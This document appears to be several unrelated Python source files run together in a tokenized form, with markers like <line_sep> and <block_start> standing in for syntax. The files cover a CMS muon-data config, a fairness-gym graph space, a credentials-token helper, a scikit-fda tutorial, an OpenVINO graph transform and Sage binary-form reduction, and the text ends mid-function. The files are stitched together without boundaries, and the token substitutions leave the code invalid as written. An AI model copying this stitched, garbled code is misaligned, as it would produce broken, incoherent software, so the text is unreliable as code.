"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C2B91F86-5A87-E611-B7E7-02163E014C10.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/C09B5970-4B88-E611-9C48-901B0E5427A6.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/BE837F4E-9E87-E611-8DC8-3417EBE7047A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/BAC10123-7787-E611-A0DE-02163E015FDF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B856E93F-E586-E611-BA74-FA163E1909D1.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B64FD56E-6E87-E611-BD9C-02163E016438.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B4BC5C81-6987-E611-B97A-F04DA275C2FB.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/B43870D6-1A88-E611-A7C0-0026B9F8CC18.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AE723C49-B287-E611-ACE5-0CC47A78A42E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AC213957-658B-E611-A7AF-0025905B8612.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/AA51B3CF-4B89-E611-A41A-02163E013C40.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A8FF1F89-E586-E611-BC37-FA163E08C002.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A28F9FFD-B489-E611-B864-008CFAFBF132.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A21B22EA-8888-E611-B0C4-0CC47A4DEEBA.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/A0C3ADD4-0E87-E611-892F-02163E014D8C.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9EE91F3C-1B87-E611-878C-FA163E775232.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9CAF60BB-4489-E611-A29C-FA163EEF018D.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9AAB70FE-D587-E611-834C-FA163ECD5C62.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9A522CDD-6287-E611-BA23-FA163E3DAA96.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/9A345235-E586-E611-9CE6-FA163EFA00C3.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/98CD93AB-3A88-E611-A4C8-B083FED04276.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/961767D1-B189-E611-A1A3-20CF305B05AE.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/90AAF1A6-5387-E611-B9B8-0025905C3DF6.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/90522755-9587-E611-A29C-C45444922BB0.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/901352B9-B189-E611-89EC-0CC47A6C183A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8E949801-8288-E611-B9D6-047D7BD6DF22.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/88ADAECF-5789-E611-81B2-FA163EDB91EF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8823F019-8587-E611-A162-00259073E3EA.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/80CD4397-2A88-E611-9639-20474791CCC4.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/8095FC8B-B389-E611-ADD9-7CD30AB7F868.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/767A38E6-6287-E611-B225-02163E015D84.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/744FC7C0-5387-E611-BA6F-FA163E06DFEA.root" 
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6CFB58E7-1587-E611-BD35-FA163EC97E57.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68DE47B4-7E88-E611-A6AE-001E67792422.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68A0DCD5-BB87-E611-8BF3-008CFA0F5040.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/68171F81-6187-E611-A9DF-001E67504F1D.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/66421E3C-5489-E611-B0BE-001E67505A2D.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/64FB46E3-8887-E611-AAAA-FA163EFA220C.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/64CC5933-4088-E611-B8DD-0025904C641E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6448920B-7D87-E611-A5EA-02163E017614.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/6297FABA-5789-E611-A918-0CC47AC08BF8.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5C7F15A9-9A88-E611-A80B-FA163EC5FCBC.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5A63963D-B887-E611-88DC-001E6739C801.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/5404AF86-6187-E611-8DB3-44A84225CDA4.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/509458EF-B189-E611-9F85-FA163E17EB18.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/4C3B6518-B189-E611-93B3-0025905A612A.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/48E6AB0F-F286-E611-9792-FA163EDB91EF.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/40E2E2DE-8887-E611-9531-FA163E2AAF83.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/38FF87C2-B189-E611-B665-0CC47A1DF7FA.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/38CE04DC-5788-E611-9240-848F69FD2853.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/32775AB1-6C87-E611-A388-02163E0165D4.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/30A4019E-FE86-E611-B70E-02163E0165B6.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/2C6B53B6-5387-E611-9582-FA163E75F411.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/26D33DC4-3889-E611-B1AF-FA163E743F0B.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/26181B1F-6387-E611-AC9E-02163E01304E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/24A815DC-0E87-E611-8D96-B083FED13C9E.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/22256107-6887-E611-847F-002590DE6E86.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/20263DED-9B88-E611-9630-001E67F336E0.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/1EF43C44-DE87-E611-BB70-6C3BE5B5B340.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/128426B7-8988-E611-BB9C-008CFA0A5A10.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/1041B010-6F87-E611-BA26-02163E015FDB.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0E90E9AF-5387-E611-9FFA-FA163EC80D44.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C894F1B-5289-E611-8381-0025904C5DE0.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C6DFDD5-4D87-E611-9CF3-FA163E0B7F2E.root" 
"/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/0C153439-B187-E611-96D9-002590E1E9B8.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/083DFA38-B189-E611-BD7C-A0369F7FC770.root" "/store/data/Run2016B/SingleMuon/RAW-RECO/ZMu-23Sep2016-v1/70000/02A6971D-F286-E611-8364-002590DE6E32.root"))<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(-1))<line_sep>process.out=cms.OutputModule("PoolOutputModule" outputCommands=cms.untracked.vstring('drop *' 'keep *_muonDTDigis_*_*' 'keep *_dt4DSegments_*_*') fileName=cms.untracked.string('/store/user/carrillo/digis_segments_Run2016BSingleMuonRAW-RECO.root'))<line_sep>process.p=cms.Path(process.muonDTDigis<times>process.dtlocalreco)<line_sep>process.this_is_the_end=cms.EndPath(process.out)<line_sep>
<import_stmt>os<import_from_stmt>.world MujocoWorldBase<line_sep>assets_root=os.path.join(os.path.dirname(__file__) "assets")<line_sep>
# coding=utf-8 # Copyright 2020 The ML Fairness Gym Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python2, python3 """Graph spaces for the ML fairness gym."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>typing Any<import_stmt>gym<import_stmt>networkx<as>nx<class_stmt>GraphSpace(gym.Space)<block_start>"""The space of random NetworkX graphs with a given number of nodes. Graphs sampled from this space are drawn from the Erdos-Renyi random graph model where each pair of nodes shares an edge with probability p. Graphs can be directed or undirected. Two graph spaces are considered equivalent if they have the same number of nodes, the same edge probability, and the same directedness. """<def_stmt>__init__ self num_nodes directed=<false> p=0.05<block_start>"""Initialize a GraphSpace instance. Args: num_nodes: A positive integer indicating the number of nodes of graphs that are contained in this space. directed: A boolean indicating whether this space contains directed or undirected graphs. p: A float in [0, 1] that gives the probability that any two nodes are connected by an edge in graphs that are sampled from this space. """<line_sep>self.num_nodes=num_nodes<line_sep>self.directed=directed<line_sep>self.p=p<block_end><def_stmt>contains self item<block_start><return>(isinstance(item nx.Graph)<and>item.number_of_nodes()<eq>self.num_nodes)<block_end><def_stmt>sample self<block_start><return>nx.fast_gnp_random_graph(self.num_nodes self.p directed=self.directed)<block_end><def_stmt>__repr__ self<block_start><return>'Graph (%d, %.4f, %s)'%(self.num_nodes self.p self.directed)<block_end><def_stmt>__eq__ self other<block_start><return>(isinstance(other self.__class__)<and>self.num_nodes<eq>other.num_nodes<and>self.p<eq>other.p<and>self.directed<eq>other.directed)<block_end><block_end>
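# --- Hedged usage sketch (not part of the original module) ---
# Minimal illustration of the GraphSpace contract: sample() draws an
# Erdos-Renyi graph on `num_nodes` nodes, and contains() only checks the type
# and the node count (it does not verify the edge probability).
if __name__ == '__main__':
  space = GraphSpace(num_nodes=10, directed=False, p=0.3)
  graph = space.sample()
  assert space.contains(graph)
  print(graph.number_of_nodes(), graph.number_of_edges())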
<def_stmt>user_token <block_start><import_from_stmt>foundations_contrib.utils foundations_home<import_from_stmt>os.path expanduser join<import_stmt>yaml<import_stmt>os<line_sep>token=os.getenv('FOUNDATIONS_TOKEN' <none>)<if_stmt><not>token<block_start>credential_filepath=expanduser(join(foundations_home() "credentials.yaml"))<if_stmt><not>os.path.isfile(credential_filepath)<block_start><return><none><block_end><with_stmt>open(credential_filepath "r")<as>file<block_start>credential_dict=yaml.load(file Loader=yaml.FullLoader)<block_end><if_stmt>"default"<not><in>credential_dict<block_start><return><none><block_end><if_stmt>"token"<not><in>credential_dict["default"]<block_start><return><none><block_end>token=credential_dict["default"]["token"]<block_end><return>token<block_end>
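# --- Hedged usage note (not part of the original module) ---
# user_token() first checks the FOUNDATIONS_TOKEN environment variable, then
# falls back to <foundations_home()>/credentials.yaml. From the lookups above,
# the YAML it expects appears to look like:
#
#   default:
#     token: <your-token>
#
# Exercising the environment-variable path with a placeholder value:
import os

os.environ['FOUNDATIONS_TOKEN'] = 'dummy-token-for-illustration'
assert user_token() == 'dummy-token-for-illustration'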
""" Representation of functional data ================================= Explores the different representations of functional data. """<line_sep># Author: <NAME> # License: MIT <import_stmt>skfda<import_from_stmt>skfda.representation.interpolation SplineInterpolation<import_stmt>skfda.representation.basis<as>basis<line_sep>############################################################################## # In this example we are going to show the different representations of # functional data available in scikit-fda. # # First we are going to fetch a functional data dataset, such as the Berkeley # Growth Study. This dataset correspond to the height of several boys and # girls measured until the 18 years of age. The number and times of the # measurements are the same for each individual. dataset=skfda.datasets.fetch_growth()<line_sep>fd=dataset['data']<line_sep>y=dataset['target']<line_sep>print(repr(fd))<line_sep>fd.plot(group=y group_colors=['red' 'blue'])<line_sep>############################################################################## # This kind of representation is a discretized representation, in which the # measurement points are shared between samples. print(fd.grid_points)<line_sep>############################################################################## # In this representation, the data can be arranged as a matrix. print(fd.data_matrix)<line_sep>############################################################################## # By default, the data points are interpolated using a linear interpolation, # but this is configurable. dataset=skfda.datasets.fetch_medflies()<line_sep>fd=dataset['data']<line_sep>first_curve=fd[0]<line_sep>first_curve.plot()<line_sep>############################################################################## # The interpolation used can however be changed. Here, we will use an # interpolation with degree 3 splines. first_curve.interpolation=SplineInterpolation(3)<line_sep>first_curve.plot()<line_sep>############################################################################## # This representation allows also functions with arbitrary dimensions of the # domain and codomain. fd=skfda.datasets.make_multimodal_samples(n_samples=1 dim_domain=2 dim_codomain=2)<line_sep>print(fd.dim_domain)<line_sep>print(fd.dim_codomain)<line_sep>fd.plot()<line_sep>############################################################################## # Another possible representation is a decomposition in a basis of functions. # $$ # f(t) = \\sum_{i=1}^N a_i \\phi_i(t) # $$ # It is possible to transform between both representations. Let us use again # the Berkeley Growth dataset. dataset=skfda.datasets.fetch_growth()<line_sep>fd=dataset['data']<line_sep>y=dataset['target']<line_sep>fd.plot()<line_sep>############################################################################## # We will represent it using a basis of B-splines. fd_basis=fd.to_basis(basis.BSpline(n_basis=4))<line_sep>fd_basis.plot()<line_sep>############################################################################## # We can increase the number of elements in the basis to try to reproduce the # original data with more fidelity. 
fd_basis_big=fd.to_basis(basis.BSpline(n_basis=7))<line_sep>fd_basis_big.plot()<line_sep>############################################################################## # Let us compare the different representations in the same plot, for the same # curve fig=fd[0].plot()<line_sep>fd_basis[0].plot(fig=fig)<line_sep>fd_basis_big[0].plot(fig=fig)<line_sep>fig.axes[0].legend(['Original' '4 elements' '7 elements'])<line_sep>############################################################################## # We can also see the effect of changing the basis. # For example, in the Fourier basis the functions start and end at the same # points if the period is equal to the domain range, so this basis is clearly # not suitable for the Growth dataset. fd_basis=fd.to_basis(basis.Fourier(n_basis=7))<line_sep>fd_basis.plot()<line_sep>############################################################################## # The data is now represented as the coefficients in the basis expansion. print(fd_basis)<line_sep>
# Copyright (C) 2018-2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 <import_stmt>logging<as>log<import_stmt>numpy<as>np<import_from_stmt>mo.front.common.replacement FrontReplacementPattern<import_from_stmt>mo.graph.graph Graph Node<class_stmt>ChangePlaceholderTypes(FrontReplacementPattern)<block_start>enabled=<true><line_sep>run_not_recursively=<true><line_sep>@staticmethod<def_stmt>is_node_casts_to_float_or_shapeof node:Node<block_start><return>(node.soft_get('type')<eq>'Convert'<and>node.soft_get('dst_type')<eq>np.float32)<or>node.soft_get('type')<eq>'ShapeOf'<block_end><def_stmt>find_and_replace_pattern self graph:Graph<block_start><for_stmt>op graph.get_op_nodes(type='Parameter')<block_start>consumer_nodes=[p.node<for>p op.out_port(0).get_destinations()]<if_stmt>all([ChangePlaceholderTypes.is_node_casts_to_float_or_shapeof(consumer)<for>consumer consumer_nodes])<block_start>log.debug('Convert data type of Parameter "{}" to float32'.format(op.soft_get('name' op.id)))<line_sep>op.data_type=np.float32<for_stmt>convert_node consumer_nodes<block_start><if_stmt>convert_node.soft_get('type')<eq>'Convert'<block_start>log.debug('Removing "Convert" node "{}"'.format(convert_node.soft_get('name' convert_node.id)))<line_sep># disconnect consumer ports of Convert operations. Then connect them with an output of Parameter convert_destinations=convert_node.out_port(0).get_destinations()<for_stmt>dst_port convert_destinations<block_start>dst_port.disconnect()<block_end><for_stmt>dst_port convert_destinations<block_start>op.out_port(0).connect(dst_port)<block_end>graph.remove_node(convert_node.id)<block_end><block_end><block_end><if_stmt>op.soft_get('data_type')<eq>np.int64<block_start>op.data_type=np.int32<line_sep>log.error('Convert data type of Parameter "{}" to int32'.format(op.soft_get('name' op.id)) extra={'is_warning':<true>})<block_end><if_stmt>op.soft_get('data_type')<eq>np.uint8<block_start>op.data_type=np.float32<line_sep>log.debug('Convert data type of Parameter "{}" to float'.format(op.soft_get('name' op.id)))<block_end><block_end><block_end><block_end>
# -*- coding: utf-8 -*- r""" Helper functions for reduction of binary forms. The algorithm for reducing is from Stoll and Cremona's "On the Reduction Theory of Binary Forms" [CS2003]_. This takes a two variable homogeneous polynomial and finds a reduced form. This is an `SL(2,\ZZ)`-equivalent binary form whose covariant in the upper half plane is in the fundamental domain. Further, the algorithm from Hutz and Stoll [HS2018]_ allows the form to be further minimized so that the coefficients have either smallest height or smallest `L_2` norm. AUTHORS: - <NAME> -- initial version of reduction as part of GSOC 2016 - <NAME> (2018-7) -- improvements to reduce and implement smallest coefficient model """<line_sep># **************************************************************************** # Copyright (C) 2018 <NAME> <<EMAIL>> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # https://www.gnu.org/licenses/ # **************************************************************************** <import_from_stmt>sage.calculus.functions jacobian<import_from_stmt>sage.functions.hyperbolic cosh sinh<import_from_stmt>sage.functions.log exp<import_from_stmt>sage.matrix.constructor matrix<import_from_stmt>sage.misc.misc_c prod<import_from_stmt>sage.modules.free_module_element vector<import_from_stmt>sage.rings.cc CC<import_from_stmt>sage.rings.complex_mpfr ComplexField<import_from_stmt>sage.rings.complex_interval_field ComplexIntervalField<import_from_stmt>sage.rings.integer_ring ZZ<import_from_stmt>sage.rings.laurent_series_ring LaurentSeriesRing<import_from_stmt>sage.rings.polynomial.polynomial_ring_constructor PolynomialRing<import_from_stmt>sage.rings.rational_field QQ<import_from_stmt>sage.rings.real_mpfr RealField<def_stmt>covariant_z0 F z0_cov=<false> prec=53 emb=<none> error_limit=0.000001<block_start>r""" Return the covariant and Julia invariant from Cremona-Stoll [CS2003]_. In [CS2003]_ and [HS2018]_ the Julia invariant is denoted as `\Theta(F)` or `R(F, z(F))`. Note that you may get faster convergence if you first move `z_0(F)` to the fundamental domain before computing the true covariant INPUT: - ``F`` -- binary form of degree at least 3 with no multiple roots - ``z0_cov`` -- boolean, compute only the `z_0` invariant. Otherwise, solve the minimization problem - ``prec``-- positive integer. 
precision to use in CC - ``emb`` -- embedding into CC - ``error_limit`` -- sets the error tolerance (default:0.000001) OUTPUT: a complex number, a real number EXAMPLES:: sage: from sage.rings.polynomial.binary_form_reduce import covariant_z0 sage: R.<x,y> = QQ[] sage: F = 19*x^8 - 262*x^7*y + 1507*x^6*y^2 - 4784*x^5*y^3 + 9202*x^4*y^4\ ....: - 10962*x^3*y^5 + 7844*x^2*y^6 - 3040*x*y^7 + 475*y^8 sage: covariant_z0(F, prec=80, z0_cov=True) (1.3832330115323681438175 + 0.31233552177413614978744*I, 3358.4074848663492819259) sage: F = -x^8 + 6*x^7*y - 7*x^6*y^2 - 12*x^5*y^3 + 27*x^4*y^4\ ....: - 4*x^3*y^5 - 19*x^2*y^6 + 10*x*y^7 - 5*y^8 sage: covariant_z0(F, prec=80) (0.64189877107807122203366 + 1.1852516565091601348355*I, 3134.5148284344627168276) :: sage: R.<x,y> = QQ[] sage: covariant_z0(x^3 + 2*x^2*y - 3*x*y^2, z0_cov=True)[0] 0.230769230769231 + 0.799408065031789*I sage: -1/covariant_z0(-y^3 + 2*y^2*x + 3*y*x^2, z0_cov=True)[0] 0.230769230769231 + 0.799408065031789*I :: sage: R.<x,y> = QQ[] sage: covariant_z0(2*x^2*y - 3*x*y^2, z0_cov=True)[0] 0.750000000000000 + 1.29903810567666*I sage: -1/covariant_z0(-x^3 - x^2*y + 2*x*y^2, z0_cov=True)[0] + 1 0.750000000000000 + 1.29903810567666*I :: sage: R.<x,y> = QQ[] sage: covariant_z0(x^2*y - x*y^2, prec=100) # tol 1e-28 (0.50000000000000000000000000003 + 0.86602540378443864676372317076*I, 1.5396007178390020386910634147) TESTS:: sage: R.<x,y>=QQ[] sage: covariant_z0(x^2 + 24*x*y + y^2) Traceback (most recent call last): ... ValueError: must be at least degree 3 sage: covariant_z0((x+y)^3, z0_cov=True) Traceback (most recent call last): ... ValueError: cannot have multiple roots for z0 invariant sage: covariant_z0(x^3 + 3*x*y + y) Traceback (most recent call last): ... TypeError: must be a binary form sage: covariant_z0(-2*x^2*y^3 + 3*x*y^4 + 127*y^5) Traceback (most recent call last): ... ValueError: cannot have a root with multiplicity >= 5/2 sage: covariant_z0((x^2+2*y^2)^2) Traceback (most recent call last): ... ValueError: must have at least 3 distinct roots """<line_sep>R=F.parent()<line_sep>d=ZZ(F.degree())<if_stmt>R.ngens()<ne>2<or>any(sum(t)<ne>d<for>t F.exponents())<block_start><raise>TypeError('must be a binary form')<block_end><if_stmt>d<l>3<block_start><raise>ValueError('must be at least degree 3')<block_end>f=F.subs({R.gen(1):1}).univariate_polynomial()<if_stmt>f.degree()<l>d# we have a root at infinity <block_start><if_stmt>f.constant_coefficient()<ne>0# invert so we find all roots! 
<block_start>mat=matrix(ZZ 2 2 [0 -1 1 0])<block_end><else_stmt><block_start>t=0<while_stmt>f(t)<eq>0<block_start>t<augadd>1<block_end>mat=matrix(ZZ 2 2 [t -1 1 0])<block_end><block_end><else_stmt><block_start>mat=matrix(ZZ 2 2 [1 0 0 1])<block_end>f=F(list(mat<times>vector(R.gens()))).subs({R.gen(1):1}).univariate_polynomial()<line_sep># now we have a single variable polynomial with all the roots of F K=ComplexField(prec=prec)<if_stmt>f.base_ring()<ne>K<block_start><if_stmt>emb<is><none><block_start>f=f.change_ring(K)<block_end><else_stmt><block_start>f=f.change_ring(emb)<block_end><block_end>roots=f.roots()<if_stmt>max(ex<for>_,ex roots)<g>1<or>f.degree()<l>d-1<block_start><if_stmt>z0_cov<block_start><raise>ValueError('cannot have multiple roots for z0 invariant')<block_end><else_stmt># just need a starting point for Newton's method <block_start>f=f.lc()<times>prod(p<for>p,ex f.factor())# removes multiple roots <if_stmt>f.degree()<l>3<block_start><raise>ValueError('must have at least 3 distinct roots')<block_end>roots=f.roots()<block_end><block_end>roots=[p<for>p,_ roots]<line_sep># finding quadratic Q_0, gives us our covariant, z_0 dF=f.derivative()<line_sep>n=ZZ(f.degree())<line_sep>PR=PolynomialRing(K 'x,y')<line_sep>x,y=PR.gens()<line_sep># finds Stoll and Cremona's Q_0 q=sum([(1/(dF(r).abs()<power>(2/(n-2))))<times>((x-(r<times>y))<times>(x-(r.conjugate()<times>y)))<for>r roots])<line_sep># this is Q_0 , always positive def as long as F has distinct roots A=q.monomial_coefficient(x<power>2)<line_sep>B=q.monomial_coefficient(x<times>y)<line_sep>C=q.monomial_coefficient(y<power>2)<line_sep># need positive root <try_stmt><block_start>z=((-B+((B<power>2)-(4<times>A<times>C)).sqrt())/(2<times>A))<block_end><except_stmt>ValueError<block_start><raise>ValueError("not enough precision")<block_end><if_stmt>z.imag()<l>0<block_start>z=(-B-((B<power>2)-(4<times>A<times>C)).sqrt())/(2<times>A)<block_end><if_stmt>z0_cov<block_start>FM=f# for Julia's invariant <block_end><else_stmt># solve the minimization problem for 'true' covariant <block_start>CF=ComplexIntervalField(prec=prec)# keeps trac of our precision error z=CF(z)<line_sep>FM=F(list(mat<times>vector(R.gens()))).subs({R.gen(1):1}).univariate_polynomial()<import_from_stmt>sage.rings.polynomial.complex_roots complex_roots<line_sep>L1=complex_roots(FM min_prec=prec)<line_sep>L=[]<line_sep># making sure multiplicity isn't too large using convergence conditions in paper <for_stmt>p,e L1<block_start><if_stmt>e<ge>d/2<block_start><raise>ValueError('cannot have a root with multiplicity >= %s/2'%d)<block_end><for_stmt>_ range(e)<block_start>L.append(p)<block_end><block_end>RCF=PolynomialRing(CF 'u,t')<line_sep>a=RCF.zero()<line_sep>c=RCF.zero()<line_sep>u,t=RCF.gens()<for_stmt>l L<block_start>denom=((t-l)<times>(t-l.conjugate())+u<power>2)<line_sep>a<augadd>u<power>2/denom<line_sep>c<augadd>(t-l.real())/denom<block_end># Newton's Method, to find solutions. 
Error bound is less than diameter of our z err=z.diameter()<line_sep>zz=z.diameter()<line_sep>g1=a.numerator()-d/2<times>a.denominator()<line_sep>g2=c.numerator()<line_sep>G=vector([g1 g2])<line_sep>J=jacobian(G [u t])<line_sep>v0=vector([z.imag() z.real()])# z0 as starting point # finds our correct z <while_stmt>err<le>zz<block_start>NJ=J.subs({u:v0[0] t:v0[1]})<line_sep>NJinv=NJ.inverse()<line_sep># inverse for CIF matrix seems to return fractions not CIF elements, fix them <if_stmt>NJinv.base_ring()<ne>CF<block_start>NJinv=matrix(CF 2 2 [CF(zw.numerator()/zw.denominator())<for>zw NJinv.list()])<block_end>w=z<line_sep>v0=v0-NJinv<times>G.subs({u:v0[0] t:v0[1]})<line_sep>z=v0[1].constant_coefficient()+v0[0].constant_coefficient()<times>CF.gen(0)<line_sep>err=z.diameter()# precision zz=(w-z).abs().lower()# difference in w and z <block_end><else_stmt># despite there is no break, this happens <block_start><if_stmt>err<g>error_limit<or>err.is_NaN()<block_start><raise>ValueError("accuracy of Newton's root not within tolerance(%s > %s), increase precision"%(err error_limit))<block_end><block_end><if_stmt>z.imag().upper()<le>z.diameter()<block_start><raise>ArithmeticError("Newton's method converged to z not in the upper half plane")<block_end>z=z.center()<block_end># Julia's invariant <if_stmt>FM.base_ring()<ne>ComplexField(prec=prec)<block_start>FM=FM.change_ring(ComplexField(prec=prec))<block_end>tF=z.real()<line_sep>uF=z.imag()<line_sep>th=FM.lc().abs()<power>2<for_stmt>r,ex FM.roots()<block_start><for_stmt>_ range(ex)<block_start>th=th<times>((((r-tF).abs())<power>2+uF<power>2)/uF)<block_end><block_end># undo shift and invert (if needed) # since F \cdot m ~ m^(-1)\cdot z # we apply m to z to undo m acting on F l=mat<times>vector([z 1])<line_sep><return>l[0]/l[1] th<block_end># // compute inverse of eps_F # from <NAME> <def_stmt>epsinv F target prec=53 target_tol=0.001 z=<none> emb=<none><block_start>""" Compute a bound on the hyperbolic distance. The true minimum will be within the computed bound. It is computed as the inverse of epsilon_F from [HS2018]_. INPUT: - ``F`` -- binary form of degree at least 3 with no multiple roots - ``target`` -- positive real number. The value we want to attain, i.e., the value we are taking the inverse of - ``prec``-- positive integer. precision to use in CC - ``target_tol`` -- positive real number. The tolerance with which we attain the target value. - ``z`` -- complex number. ``z_0`` covariant for F. - ``emb`` -- embedding into CC OUTPUT: a real number delta satisfying target + target_tol > eps_F(delta) > target. EXAMPLES:: sage: from sage.rings.polynomial.binary_form_reduce import epsinv sage: R.<x,y> = QQ[] sage: epsinv(-2*x^3 + 2*x^2*y + 3*x*y^2 + 127*y^3, 31.5022020249597) # tol 1e-12 4.02520895942207 """<def_stmt>RQ delta# this is the quotient R(F_0,z)/R(F_0,z(F)) for a generic z # at distance delta from j. See Lemma 4.2 in [HS2018]. 
